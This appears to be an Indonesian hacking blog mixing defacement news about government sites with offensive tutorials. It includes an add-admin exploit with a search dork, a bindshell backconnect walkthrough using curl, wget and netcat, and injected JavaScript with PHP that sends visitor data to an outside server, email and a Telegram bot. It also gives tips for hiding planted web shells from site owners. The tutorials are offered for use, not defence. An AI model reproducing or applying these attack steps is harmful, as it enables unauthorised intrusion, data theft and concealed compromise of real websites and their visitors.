Bandung Digital Security

Hacker Galau Meretas 2 Subdomain KPU

2018-12-13T23:13:00.001-08:00

Memang bicara tentang berita peretasan dinegeri sendiri tidak ada habisnya, Kali ini hacker dengan codename Khatulistiwa meretas situs KPU Papua dan KPU Kabupaten Bulukumba yang beralamatkan di kpu-papua.go.id dan kab-bulukumba.kpu.go.id, Dilihat dari script pelaku nampaknya hacker yang satu ini sedang galau, Berikut pesan yang di tinggalkan oleh pelaku;

Rindu masa-masa itu

TR1PL3_D0WN - Khatulistiwa - D4RK_CYB3R - Mr.4c1L Cr0tZz - XALVADOR_ - s1sskayy_cyb3r - PyschoRzy - KEC0A_T3RBANG - C0RT3X

Dalam peretasan kali ini memang pelaku memang tidak merusak halaman depan dan hanya menitipkan file touch.html, memang hacker indonesia suka "iseng" dan melampiaskan ke-galauannya di situs-situs pemerintah. Berikut subdomain KPU yang diretas oleh pelaku:

http://papua.kpu.go.id/touch.html
http://kab-bulukumba.kpu.go.id/touch.html

Saat berita ini rilis, Situs KPU Papua masih dalam keadaan diretas dan belum ada perbaikan dari admin pengelola website.

Sekian berita hari ini. Terima kasih sudah berkunjung have a nice day :)

-pixelscoders
(14/12/18) 14:05

Kritikan Di Situs Birohukum Jogjakarta

2018-12-11T22:49:00.000-08:00

Bicara tentang peretasan di negeri sendiri memang tidak ada habisnya, kali ini hacker dengan codename TehSariwangi404 dengan Mum3i beraksi, Mereka meretas website Birohukum Yogyakarta yang beralamatkan di http://birohukum.jogjaprov.go.id/

Memang halaman depan website masih terlihat normal, Namun jika membuka http://birohukum.jogjaprov.go.id/Ind3x.html berubah dengan background hitam serta terpampang manusia badut yang identik dengan film "IT" yang disutradari Andy Muschietti. Pada peretasan kali ini pelaku sangat menyindir bagaimana tentang kinerja hukum yang ada di Indonesia. Berikut pesan yang ditinggal oleh pelaku:

TehSquadCyber

Hacked By TehSariwangi Ft Mum3i

Bagaimana dengan hukum di Indonesia?

Ketika yang LANCIP kebawah dan yang TUMPUL keatas

Seperti itulah hukum sekarang:)

Backup?

index.php.back

Memang negeri ini penuh dengan ketidak-adilan dan tentu kita semua mempunyai pendapat masing masing yang ingin diungkap kan, dari Kritikan di Birohukum Yogyakarta kita bisa lihat yang mungkin seseorang dengan mudah nya menyampaikan pendapat dengan cara yang salah, karena tindakan ini adalah sebuah kejahatan karena merusak karya orang lain.

Dan terakhir sampai berita ini diturunkan belum ada sama sekali perbaikan dari pihak admin website itu sendiri. Terima kasih sudah berkunjung. Have a nice day :)

-pixelscoders
(12/12/18) 13:31

Polda Kepulauan Riau Disambangi Hacker

2018-12-11T00:21:00.001-08:00

Kali ini duet hacker dengan indonesia kembali beraksi, duet hacker ini meretas Polda Kepulauan Riau beserta subdomainnya yang memiliki alamat website poldakepri.net, Pelaku mengganti halaman utama dari situs tersebut, tidak jelas alasan pelaku meretas Polda Kepulauan Riau , pelaku hanya meninggalkan pesan dan juga team yang lain

Hacked By KID2ZON3 - ./E4OXY

Teruntuk masa lalu, berhentilah menepuk punggungku. Aku tidak ingin melihat ke belakang

\Greetz/

Anon Cyber Team - IndoXploit Coders Team - N45HT - 99Syndicate

-Indonesia Hacker Rulez-

Sampai saat berita ini dirilis, Domain Polda Kepulauan Riau beserta subdomainnya tersebut masih dalam keadaan diretas dan belum ada perbaikan dari pihak pengelola website. Berikut subdomain yang diretas oleh pelaku

http://poldakepri.net/
http://barelang.poldakepri.net/
http://ditnarkoba.poldakepri.net/
http://ditreskrimsus.poldakepri.net/
http://ditreskrimum.poldakepri.net/
http://karimun.poldakepri.net/
http://laporanpolisi.poldakepri.net/
http://spdp1.poldakepri.net/
http://subdit.poldakepri.net/
http://tersangka.poldakepri.net/
http://tes.poldakepri.net/
http://uji.poldakepri.net/
http://web.poldakepri.net/

Dengan melihat seperti ini tidak terjadi lagi karena ini sangat merugikan bagi semua orang yang ingin mengakses website tersebut. Dan untuk si peretas tindakan ini bisa berujung dengan pasal yang berlaku dan bisa di adili dipersidangan.

Sekian untuk berita hari ini, terimakasih sudah berkunjung have a nice day.

-pixelscoders
(11/12/18)

Hacker Iseng Retas Situs Kabupaten Balangan

2018-12-09T07:21:00.001-08:00

Lagi lagi situs tanah air kembali tumbang karena ulah usil hacker yang kali ini dengan codename 4LM05TH3V!L beraksi, pelaku tersebut meretas domain utama kabupaten balangan dan subdomainya, Tidak diketahui apa motif dari pelaku, pelaku hanya meninggalkan pesan singkat dan juga beberapa codename seperti dibawah ini,

w00tz???

Owned by 4LM05TH3V!L

Hidden Ghost Team

-=[ Shootz ]=-

M1NT_1X - EppCrazy - Mr.TR1N1TY - Mr.Chip21 - Doraemon v1.5 - Mr.xBarakuda - Desktop77N3T

Cyberpunks - ./Mr.Tahu - ./C3W3KBerB4T4n9 - limit[ed] - Mr.b0t4k - TN72 - TehTawar404

© Hidden Ghost Team

Sampai saat berita ini dirilis, Domain dan subdomain kota Balangan tersebut masih dalam keadaan diretas dan belum ada perbaikan dari pengelola website. Berikut domain yang diretas oleh pelaku;

http://balangankab.go.id
http://awayan.balangankab.go.id/lin.php
http://dinaskearsipan.balangankab.go.id/lin.php
http://disdukcapil.balangankab.go.id/lin.php
http://dishub.balangankab.go.id/lin.php
http://dpmptsp.balangankab.go.id/lin.php
http://jdih.balangankab.go.id/lin.php
http://kelurahanpartim.balangankab.go.id/lin.php
http://kesbangpol.balangankab.go.id/lin.php
http://korpri.balangankab.go.id/lin.php
http://mediacenter.balangankab.go.id/lin.php
http://p2tpm.balangankab.go.id/lin.php
http://pariwisata.balangankab.go.id/lin.php
http://rsud.balangankab.go.id/lin.php

Dan mirrornya kalian bisa lihat disini:
http://www.zone-h.org/archive/notifier=4LM05TH3V!L

Semoga tidak ada lagi situs indonesia yang tumbang hanya karena keisengan dari para hacker indonesia. Sekian untuk berita hari ini, terimakasih sudah berkunjung.

-pixelscoders
(9/12/2019) 22:17

BRIGHTBRIX® Web Producer - Extending the Internet Add Admin Vulnerability

2018-09-05T21:37:00.000-07:00

=====================================================================
Exploit Title : BRIGHTBRIX® Web Producer Add Admin Vulnerability
Author : Zaenal Arifin
Exploit Date : September 06, 2018
Software : https://www.brightbrix.com/
Vendor : https://www.brightbrix.com/
Version : -
Home : www.bandungdigitalsecurity.org
Tested on : Windows 7/10 64x - BackBox Linux 5.0 64x
Exploit Risk : Medium
=====================================================================

Proof of Concept :
Search in google browser or another browser and use the dork :
Dashboard for BRIGHTBRIX® Web Producer - Extending the Internet
and us ur brain to develop this dork.

and Use Exploit :
/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen

If vuln then you will find a form to create a new account

and fill in the active e-mail, and check your e-mail for activation of the code and creat ur password, if it is then it will go directly to the dashboard page.

Proof : > https://image.ibb.co/jCa2je/Pwnd.png

Demo : https://www.brightbrix.com/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen

===========================================
Contact Me :
https://www.facebook.com/darkvenom.gov
zaenalarifin.net@gmail.com
===========================================
=====================================================================
Special Thanks to : Familly Team_CC | AnonGhost | MilWorm | TeaMp0is0N | Fallaga Team
=====================================================================

AnonGhost Hacked Afghanistan Military Website

2018-08-25T06:14:00.001-07:00

And it happened again The official website of the Afghanistan Military hacked by AnonGhost, was apparently being hacked by hackers. when our party opened a website that addressed http://www.airman.af.mil the appearance of Black with the Islamic Images and read "US army + Israeli Army = Children Killers" and include a message :

This Message Is Addressed To the United States Government :

you have failed as expected.

for long time,we have witnessed your unjust laws.

you have abused human rights, killed thousands of innocents ,

supported Israel to kill innocent Palestinians in Gaza strip.

bombings houses and mosques,arresting and killing innocent people in Iraq & Afghanistan

using media propaganda to justify your lies and your corrupt act...

now it's our turn to react

because we are the voice of muslims everywhere.

We are AnonGhost, We are Legion, United as ONE, Divided by ZERO.

We do not forgive Injustice.We do not forget Oppression.

US Government

"We are AnonGhost, We are legion, We do not forgive, We do not forget, Expect us."

you have to Expect Us !

It is not clear whether the website administrator who handles the website has known about this cyber attack. Because until now, the deface display can still be found.

Who does not know the name AnonGhost in its time in 2012-2014 the team is a team that shocked the part of the world where this hacker is a jihad cyber hacking tens of thousands of websites in a few days. after a long time not appearing this time AnonGhost returned and hacked the Afghan Military Site.

Until this news has been posted, there has been no response from the website manager, and still save the file named owned.html, we can see the display in the following archive:
http://www.zone-h.org/mirror/id/31589934

or can directly see at the address:
http://www.airman.af.mil/
http://www.pdg.af.mil/index.php

(Zaenal Arifin)

Situs Biro Hukum Departemen Kementrian Kesehatan Diretas

2018-08-22T18:47:00.000-07:00

Baru-baru ini situs Biro Hukum Departemen Kementrian Kesehatan Diretas, pada tanggal 23 Agustus 2018 saat diakses website Biro Hukum Kementrian Kesehatan yang beralamat pada http://hukor.kemkes.go.id/ tampilan berubah menjadi Background Merah Putih dan terpampang sebuah Gambar Meme Para Narapidana Korupsi dan Bertuliskan "SEBANGSAT APAPUN KALIAN JANGAN LUPA TETAP TERSENYUM KARENA SENYUM ADALAH IBADAH" pada gambar tersebut berikut sekilas tampilan nya :

dan berisi pesan yang mengkritik pemerintah berikut Pesan yang disampaikan oleh hacker tersebut :

"Hacked by MrMoonz ft KaizeN"

Di puncak pemimpin yang bebas korupsi, disitulah masa depan negri.

Jangan Benci Negara, Bencilah Pemerintahnya

Karena, Rakyat adalah Kekuatan.

Jangan Benci Hacker, Bencilah Kodenya

Karena, Tidak Ada Sistem yang Aman

Greatz

Res7ock Crew | Ghost Sec-Team | Sanjungan Jiwa

Indonesian Hacker Rulez

dan mencantumkan bebrapa Codenama lain nya Berikut isi kontent yang terpampang pada halaman depan situs biro hukum kementrian kesehatan, tampaknya motif dari serangan ini memiliki arahan terhadap pemerintah yang korup.

Situs Hukor Kementrian Kesehatan ini masih berfungsi seperti semestinya dimana menampilkan informasi-informasi penting.

berikut daftar website yang diretas :

http://hukor.depkes.go.id/
http://hukor.kemkes.go.id/

Setelah diluncurkan nya berita ini belum ada tanggapan serius dari pengelola website. seharusnya ini bisa menjadi perhatian penting bagi pengelola karena ini merupakan hal yang sangat fatal.

(Zaenal Arifin)

Subdomain Situs Komisi Pemberantasan Korupsi (KPK) Diretas

2018-08-20T19:52:00.001-07:00

Baru baru ini Subdomain dari Situs Komisi Pemberantasan Korupsi alias KPK lebih tepatnya pada Subdomain e-LHKPN KPK Diretas , Peretas tidak merusak tampilan halaman depan namun merusak index dari direktori penyimpanan gambar yaitu pada bagian /images yang beralamat pada : https://elhkpn.kpk.go.id/images/ , Saat dikunjungi Tampilan berubah menjadi Latar putih dan berisikan Sebuah Kata-kata dan sebuah gambar Kartun dimana tulisan tersebut bertuliskan :

"Hacked by MrMoonz"

[ Indonesian Hacker Rulez ]

Laughing at your security! Security is just an illusion!

Copyrights © Rabbit Security Team 2018

Entah apa motif dari kasus peretasan ini Belum jelas apakah administrator website yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :
https://defacer.id/archive/mirror/2586126

atau bisa langsung melihat di alamat :

https://elhkpn.kpk.go.id/images/

(Zaenal Arifin)

Situs Paspampres Kembali Diretas

2018-08-20T18:29:00.002-07:00

Dan Terjadi lagi Website resmi Pasukan Pengamanan Presiden alias Paspampres tampaknya sedang diusili hacker. ketika pihak kami membuka sebuah file yang bernama owned.html tampak tampilan Hitam dengan Logo Devilz Street dan bertuliskan "Owned by Typical Idiot Security"

Belum jelas apakah administrator website Paspampres yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Belum diketahui pula siapakah hacker di balik serangan model deface ini. Domain mil.id sendiri sengaja dibuat PANDI (Pengelola Nama Domain Internet Indonesia) untuk kebutuhan militer.

Kejadian ini pernah terjadi pada Sabtu, 02 Mei 2015 dan kali ini pada tanggal 21 Agustus 2018 Website Resmi Paspampres kembali menjadi target para hacker.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :
http://www.zone-h.org/mirror/id/31589934

atau bisa langsung melihat di alamat :

https://www.paspampres.mil.id/owned.html

(Zaenal Arifin)

ASP Shell Backdoor

2018-08-12T20:14:00.004-07:00

Oke Kali ini Kita Update kembali , kali ini saya akan share ASP Shell Backdoor Shell ini beda dengan shell biasanya karena shell ini khusus hanya untuk Windows Server 2012 tepatnya pada Server IIS-8. Terkadang kita menemukan sebuah website dan ketika kita upload sebuah file ketika upload sukses namun ketika dilihat 404 Not Found dan tampilan nya merupakan 404 Not Found dari Server IIS-8 , yaps karena website yang menggunakan server IIS tidak bisa mengupload ext file sembarangan , jarang yang meng enablekan untuk ext php karena rentan dari attack , maka dari itu shell ini diperlukan karena shell ini di design khusus untuk Windows Server.

Apa sih bedanya Shell ASP sama PHP ? yok sedikit bahasan biar ga kaku :v

ASP merupakan kependekan dari Active Server Pages, suatu jenis program yang bekerja dalam Microsoft (Windows) melalui IIS (Internet Information Server). ASP memerlukan server Microsoft untuk menjalankan website. Sedangkan program PHP atau Hypertext Preprocessor berjalan di server Linux atau Unix. PHP yang lebih baru bisa berjalan di server NT.

Program PHP juga bisa berjalan di Windows, Solaris, Unix dan Linux sedangkan ASP hanya bisa berjalan di server dengan platform Windows. Baru-baru ini saja, ASP bisa berjalan pada platform Linux yang hanya ada bila sudah terinstall ASP-Apache di servernya.

PHP sangatlah fleksibel ketika dikoneksikan dengan database. PHP bisa terkoneksi dengan beberapa database dimana yang sebagian besar digunakan adalah MySQL. Harap dicatat bahwa MySQL tidak akan membebani Anda sesen rupiah pun. Tapi bila Anda ingin memakai ASP, Anda perlu untuk membeli MS-SQL, produknya Microsoft.

Kecepatan me-load adalah faktor besar dalam memelihara website. Jika Anda sangat selektif soal kecepatan, Anda mungkin lebih membutuhkan PHP. Pada dasarnya kode PHP berjalan lebih cepat daripada ASP karena berjalan di space-nya sendiri sedangkan ASP menggunakan sebuah tambahan server dan menggunakan arsitektur berbasis COM.

Dalam bekerja dengan PHP, kebanyakan tools terasosiasi dengan program yang kebanyakan berupa open source software, jadi Anda tidak perlu membayar untuk mendapatkan tool tersebut. Tidak seperti ASP yang mungkin mengharuskan kita untuk membeli tool tambahan untuk bekerja dengan program ini.

Kesimpulannya, baik PHP dan ASP mempunyai keuntungan dan kerugian. Pada dasarnya semua bergantung pada bagian pengembangan website mana yang akan Anda pilih. Apakah Anda mencemaskan biaya dari pembuatan website Anda? Apakah anda ingin menggunakan bahasa pemrograman yang familiar dengan Anda? Apakah Anda menginginkan website yang lebih stabil dan cepat? Pemilihan antara ASP dan PHP pada dasarnya tergantung pada preferensi Anda sendiri. Sebaiknya Anda berunding dengan programer atau webmaster lainnya dan cari sebanyak mungkin informasi mengenai kode pemrograman mana yang paling pas dengan website Anda.
mungkin cukup sekian lah asupan tentang asp nya :v

oke langsung saja berikut merupakan tampilan dari shell nya :

Source :
https://pastebin.com/iuJhCm8Y

Semoga Bermanfaat

(Zaenal Arifin)

Update Free WordPress Hosting 2018

2018-08-09T05:32:00.001-07:00

Oke Kembali lagi bersama saya , Kali ini saya akan memberi kabar gembira bagi para gretongers alias pecinta Gratisan yaps kali ini mengenai Hosting webserver :V

Kali ini Rumahweb menyediakan Hosting WordPress Secara Gratis berikut spesifikasinya :

menggabungkan performa Litespeed Webserver yang tak terbantahkan dengan kemudahan pengelolaan WordPress dari Plesk Panel.
LiteSpeed WebServer untuk akses website secepat kilat
WordPress Toolkit untuk kemudahan mengelola WordPress
Plesk Panel yang kaya fitur
Unlimited Traffic
Free SSL
Cloud Based Infrastructure yang reliable

Wow cukup menggiurkan bukan untuk para gretongers , yok buruan jangan sampai telat karena promo ini berbatas waktu.

Kalian bisa Registrasi disini , so tunggu apa lagi ?

Semoga bermanfaat bagi para gretongers ;) selamat beraktifitas kembali
Terimakasih telah berkunjung di website kami pantau terus situs kami untuk update hal-hal menakjubkan lainnya :p

(Zaenal Arifin)

Tutorial Backconnect Dengan BindShell

2018-08-08T02:35:00.000-07:00

Okay this time I will give a simple tutorial on how to backconnect using bindshell . many problems that are often encountered when going to rooting the server are in step 1, namely backconnect, there may be many ways to do backconnect but this time I will give a tutorial by using bindshell

Material :

Bindshell script : Here

Shell backdoor / webconsole shell : Here

netcat [if user windows] : Here

Proof of Concept :

Step 1 :
Upload BindShell file, if web server not acceptable to upload shell using browser uploader u can try using command

Command Upload :

Using Curl : curl -o bind.pl [scriptlink]

Using Wget : wget [scriptlink] -o bind.pl

Step 2 :
if u done upload the file go to cmd/Terminal [Netcat Folder]

Using Command :
Windows User : cd C:/[PathNetcat]/
Linux User : Direct order

Step 3 :
Command nc -vv [ServerIP] [Port]

if done not enter first
and go to shell backdoor/webconsole

Step 4 :
in web console u can command
Perl bind.pl 1337

and Press Enter

Notes : bind.pl => Name file bindshell , 1337 => Port

Step 5 :
Go back in cmd/Terminal
and Press Enter

and see what happens

Backconnect Success :p

PoC Video :

Notes : This trick does not run 100% on all servers and the important thing that must be considered is PERL, whether the web server is ON or OFF

(Zaenal Arifin)

Serangan Malware Pada Arch Linux AUR Repository - Tiga Paket Terinfeksi

2018-07-22T09:42:00.002-07:00

Repositori perangkat lunak Linux Arch bernama Arch User Repository (AUR) telah terinfeksi oleh malware. Sebanyak tiga paket Linux Arch yang tersedia di repositori telah dilaporkan mengandung malware.

Repositori memiliki paket yang dikirim oleh pengguna, dan begitulah cara malware itu dirilis di repositori. Seorang pengguna bernama "xeactor" mengambil alih paket ‘orphaned’ dengan nama "acroread" yang berfungsi sebagai penampil PDF dan menambahkan kode jahat.

Seperti yang dilakukan Git, "Xeactor" menambahkan kode yang akan mengunduh skrip yang nantinya akan menginstal perangkat lunak yang ikut campur dengan "sistemd" dan mengkonfigurasikannya kembali. Skrip ini akan berjalan setiap 360 detik.

Malware yang dimaksudkan untuk mengumpulkan data dari sistem yang terinfeksi termasuk tanggal, waktu, ID mesin, rincian paket pengelola, informasi CPU dan output dari perintah "uname-a" dan "systemctl list-units". Data yang dikumpulkan akan diposting dalam file Pastebin baru.

Dua paket lain juga terinfeksi dengan cara yang sama. Meskipun tidak menimbulkan ancaman serius terhadap komputer yang terinfeksi, diperkirakan bahwa "xeactor" dapat meluncurkan malware lain karena mekanisme pembaruan diri tidak disertakan.

Setelah menemukan malware, perubahan yang dilakukan dalam paket itu dibatalkan, dan tim AUR telah menangguhkan "xeactor."

Namun, serangan malware ini menimbulkan kekhawatiran serius atas kredibilitas repositori paket yang dikirim pengguna. Awal tahun ini, Tim Toko Ubuntu juga menemukan penambang cryptocurrency yang tersembunyi dalam paket Ubuntu.

Peretas Menggunakan Server Google Untuk Menyelenggarakan Malware Secara Gratis

2018-07-22T09:41:00.002-07:00

Di masa lalu, para peneliti keamanan telah menemukan kasus di mana hacker yang terkenal mampu menggunakan data gambar EXIF untuk menyembunyikan kode berbahaya. Teknik ini masih banyak digunakan untuk menginfeksi pengguna web dengan malware.

Selangkah lebih maju, telah ditemukan bahwa peretas telah menemukan cara untuk berbagi malware melalui server Google tepercaya dan tepercaya seperti milik googleusercontent. Bertentangan dengan malware yang disimpan dalam file teks, jauh lebih sulit untuk melihat muatan berbahaya dalam gambar. Selain itu, semakin sulit melaporkan malware yang ditemukan di googleusercontent.com ke Google.

Bagi mereka yang tidak tahu, googleusercontent adalah domain Google untuk melayani konten yang disediakan pengguna tanpa memengaruhi keamanan laman Google sendiri.

Sesuai laporan Sucuri, kode berikut terlihat dalam skrip yang mengekstrak kode keamanan PayPal:

Skrip membaca data EXIF dari gambar googleusercontent, yang mungkin diunggah oleh seseorang di akun Google+ atau Blogger. Ketika bagian UserComment dari data EXIF-nya didekodekan, ternyata itu adalah skrip yang memiliki kemampuan untuk mengunggah file web shell dan arbitrary.

Ini menggaris bawahi ancaman yang lebih besar karena tidak ada cara untuk mendeteksi malware sampai seseorang memeriksa meta data gambar dan menguraikannya. Bahkan setelah menemukan malware, seseorang tidak dapat mengetahui sumber sebenarnya dari gambar tersebut.

WellMess : Malware Berbasis Go Kini Menyerang Komputer Linux dan Windows

2018-07-22T09:40:00.001-07:00

Tidak ada keraguan bahwa Linux dan Mac adalah pilihan sistem operasi yang lebih aman daripada Microsoft Windows. Tetapi ini tidak berarti bahwa peretas tidak menemukan cara untuk menginfeksi komputer yang menjalankan sistem operasi ini - di masa lalu, kami menemukan botnet Mirai masif yang mengontrol perangkat jaringan yang menjalankan Linux.

Pembuat Mirai menggunakan bahasa pemrograman Golang (juga disebut Go) untuk menulis kode malware. Baru-baru ini, para peneliti keamanan di JPCERT (Via: TechRepublic) telah menemukan malware lain yang ditulis di Go; itu bahkan fitur kemampuan lintas-platform dan datang dalam dua versi.

Namanya WellMess, malware ini mempengaruhi sistem operasi Linux dan Windows. Sementara fungsi dasar dari kedua versi malware tetap sama, ada beberapa perbedaan kecil.

Sama seperti malware lainnya, WellMess berkomunikasi dengan perintah & kontrol (C & C) pusatnya dan mengunduh perintah untuk tindakan lebih lanjut. Perintah dapat diberikan dari server C & C untuk mengunggah / mengunduh file dan mengeksekusi perintah shell sewenang-wenang. Versi Windows lebih lanjut memiliki kemampuan untuk menjalankan skrip PowerShell.

Perintah dikirim ke perangkat yang terinfeksi dalam bentuk permintaan HTTP Post terenkode RSA; data header cookie dienkripsi RC6. Bukan itu saja. WellMess juga memiliki versi yang dikembangkan di .Net Framework. Data cookie dalam versi .Net sama dengan versi Go.

Seperti JPCERT, kejadian-kejadian serangan telah ditemukan di organisasi Jepang, dan mereka dapat terus berlanjut di masa depan juga.

Tutorial Memasang Keylogger di JavaScript

2018-07-22T09:38:00.001-07:00

Oke sebelumnya saya sudah menjelaskan tentang Keylogger di Java Script kali ini saya akan memberikan tutorial cara memasangnya.

Jika belum tahu kalian bisa Baca disini : Java Script Keylogger

langsung saja pertama kita buat file jquery nya terlebih dahulu
dengan code :

var r=document.referrer;if(r != ""){var x = new XMLHttpRequest();x.open("GET", "https://labs.suicide-db.com/shell.php?ref=" + r, true);xhttp.send();}

sedikit penjelasan :
https://labs.suicide-db.com/shell.php : ini merupakan web kalian yang berisikan shell yang berisi keylogger.

jika sudah save dengan format .js jika sudah kalian bisa membuat script ini :

<script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script>

Letakan script ini didalam meta <head> </head> Contoh :

<head><script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script></head>

jika sudah kita ke tahap selanjutnya kita kembali ke step atas di bagian pada link https://labs.suicide-db.com/shell.php nah sekarang kita akan membuat file shell.php ini

pertama kalian masuk filemanager website kalian dan buat sebuah file shell.php atau bebas disini saya membuat file shell.php jika sudah masukan script berikut :

<?php@date_default_timezone_set('Asia/Jakarta');error_reporting(0);error_log(0);if(isset($_GET['ref'])){$url = $_GET['ref'];if(!empty($url)){$sb = "[SHELL][Xenzia Worm][".date('D, d M Y H:i:s')."]";$headers = "From: PROLOGGER <KeyLogger@xenzia.worm>\r\n";$msg = "+------------------------------------------+\n# SHELL LOG ".date('D,d m Y H:i:s')."\n+------------------------------------------+\n# URL :: ".$url."\n+------------------------------------------+\n# JavCode @ 2018 | Powered by : shutdown57\n+------------------------------------------+\n";@mail("postmaster@zaenalarifin.net",$sb,$msg,$headers);@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);$fp = fopen('sl/JavCode-'.date('dmY').'.txt','a');fwrite($fp,$msg);fclose($fp);}exit;}else{exit('?');}

Oke hal yang harus diperhatikan :
@mail("postmaster@zaenalarifin.net",$sb,$msg,$headers); (log dari shell ini akan masuk ke alamat email kalian)

@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);

(log dari shell akan masuk ke alamat pesan telegram kalian)

jika sudah save file nya dan keylogger sudah terbuat
Oke mudah bukan , mungkin cukup sekian semoga bermanfaat

Jika masih tidak mengerti kalian bisa hubungi saya di Menu Contact Us

(Zaenal Arifin)

JavaScript Keylogger

2018-07-22T09:36:00.000-07:00

Oke Kembali lagi bersama saya kali ini saya akan share tutorial membuat/membongkar key logger di Java Script tepatnya di Jquery buatan Shutdown57 dari JavaCode.

Pada umumnya keylogger dibuat dalam bentuk code PHP namun teknik tersebut sudah diketahui banyak orang dan memunculkan sebuah inspirasi baru dari Shutdown57 untuk tetap menjalankan Keylogger tanpa diketahui yaitu menggunakan ref dari Jquery
Kok bisa dari script jquery ?

yaps disini kita memfungsikan request ajax yang ambil referrer dari shell.
Berikut Code Singkat Jquery nya :

var xhttp = new XMLHttpRequest();xhttp.open("GET", "http://x.linuxcode.org/_.php?ref=" + document.referrer, true);xhttp.send();

Yaps disini kita bisa melihat request dari referrer menuju sebuah link yaitu http://x.linuxcode.org/_.php

nah disinilah letak keylogger nya , dalam intinya keylogger ini sama menggunakan code php namun disini author membuat agar tidak diketahui orang melainkan melalui request referrer dari link lain menggunakan fungsi request dari jquery yang akan diarahkan menuju http:/x.linuxcode.org/_.php agar tidak dapat diketahui orang dan orang akan mengira file jquery ini merupakan fungsi yang seperti biasanya dalam arti (bukan sebuah file berbahaya/hanya untuk memfungsikan style dalam web itu sendiri)

Oke tahap selanjut nya , apa isi dari http:/x.linuxcode.org/_.php ?

yaps jika kita buka maka link tersebut blank atau tidak ada isinya mengapa ? karena ini hanya berisikan code php keylogger tanpa ulasan sedikitpun , oke lalu isi code nya apa ?

Isi dalam file _.php itu code php keylogger

berikut Code nya seperti ini :

<?php@date_default_timezone_set('Asia/Jakarta');error_reporting(0);error_log(0);
if(isset($_GET['ref'])){$url = $_GET['ref'];if(!empty($url)){$sb = "[SHELL][shutdown57][".date('D, d M Y H:i:s')."]";$headers = "From: PROLOGGER <LoggerShell@shutdown57.today>\r\n";$msg = "+------------------------------------------+\n# SHELL LOG ".date('D,d m Y H:i:s')."\n+------------------------------------------+\n# URL :: ".$url."\n+------------------------------------------+\n# JavCode @ 2018 | Powered by : shutdown57\n+------------------------------------------+\n";@mail("indonesianpeople.shutdown57@gmail.com",$sb,$msg,$headers);@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);$fp = fopen('sl/JavCode-'.date('dmY').'.txt','a');fwrite($fp,$msg);fclose($fp);}exit;}else{exit('?');}

Yaps itu merupakan isi dari file _.php didalam script keylogger diatas memakai 3 fungsi logger yang akan dikirimkan ke :

Kedalam Server
Kedalam Email @mail()
Kedalam Telegram dengan menggunakan Api Telegram message

Jadi keylogger disini mengmbil dari referrer shell yg berada di http:/x.linuxcode.org/_.php
terus bagaimana jika shell menggunakan Password ?

Kalian bisa pasang :

echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";

untuk ambil variabel password nya

Untuk Cara pemasangan Keylogger Kalian Bisa Baca disini :
Cara Memasang Kylogger di Java Script

Oke mungkin cukup sekian dan terimakasih semoga bermanfaat

Selamat Beraktifitas kembali

(Zaenal Arifin)

Trik Agar Shell Backdoor Tidak Diketahui Orang bahkan [Google Dorking]

2018-07-15T05:28:00.000-07:00

Oke gengs ketemu lagi sama saya Zaenal yang gans tiada tara , kali ini saya akan share trik agar shell backdoor kalian tidak terkena dorking orang

Oke jadi gini ,Jadi kesimpulan nya sangat simple ..

Pada dasarnya ketika orang dorking shell menggunakan google dork yang cukup relevan

Ex : inurl:/wp-content/plugins/name/shell.php

yaps /shell.php ini yang sangat fatal karena di web ada meta tag , otomatis shell/seluruh file yg sudah masuk di web akan terindex di google

otomatis masuk cache google
Example :

jadi ketika kita membuat shell di dir yg kita buat

Ex : /Haxor dan upload file index.php << index.php berisikan source code shell kalian

jadi ketika kita buka dir nya bisa tanpa extentsi .php karena

Kemungkinan besar tidak akan diketahui orang lain walaupun terindex google karena kebanyakan jika nama shell kalian aneh" itu jadi pertimbangan para pencuri shell mungkin mereka fikir itu peluang besar untuk mencuri

dan jangan kalian membuat nama dir yg identik dengan Hacker / Sejenisnya kalian bisa membuat dir dengan nama default dir cms , plugins atau sejenisnya

Ex : /javascript - /css - /filemanager - /tinymce

dan jika orang lain membuka dir /javascript otomatis mereka berfikir bahwa ini bukan merupakan sebuah shell

dan hal paling penting set shell background dengan menu tampilan forbidden biar lebih meyakinkan karena bisa jadi mereka mengira bahwa dir tersebut di setting forbidden oleh admin dari web tersebut

mungkin trik shell forbidden sudah diketahui tetapi para anak" gblk cukup pintar dan melihat file name nya tidak langsung di close

dan nama shell ini juga yg menjadi perhatian karena si anak" gblk pinter mana mungkin admin membuat nama file yg aneh contoh :

Ex : /wp-content/plugins/sayang.php

Nah mungkin begitu lah teknik nya

dan jangan lupa

Jangan pernah kalian menggunakan <title>Shell bekdor apalah</title> cukup gunakan title Forbidden biar orang lain yakin , dikarenakan jika title shell kalian

Ex : <title>Mini Shell</title>

Otomatis Anak" kntl lebih mudah untuk mencari karena ketika mereka membaca nama shell sudah pasti niat gblk nya dan mencoba untuk menuju link yg muncul dan efek yg terjadi shell kalian akan hilang begitu saja

Berikut Sebuah contoh shell yg terkena dorking dan pasti di klik oleh orang lain :

Semoga bermanfaat

(Zaenal Arifin)

Cara Membuat Icon Menu Navigasi di Blogger

2018-07-12T06:50:00.002-07:00

Oke kembali lagi bersama saya kali ini saya akan memberi tutorial cara membuat icon menu di Navigasi Blog.

Apa sih untung nya memakai Icon Menu ?
Yups selain mempercantik tampilan halaman blog anda , tentu saja mungkin menjadi daya tari tersendiri, dan kepuasan tersendiri

Oke langsung saja masuk tahap pertama

Bahan yang harus disediakan :

CSS
Kopi Hangat
Dan tentu saja koneksi Internet

Oke kalian bisa mengambil CSS nya disini :

CSS 1 : Here

CSS 2 : Here

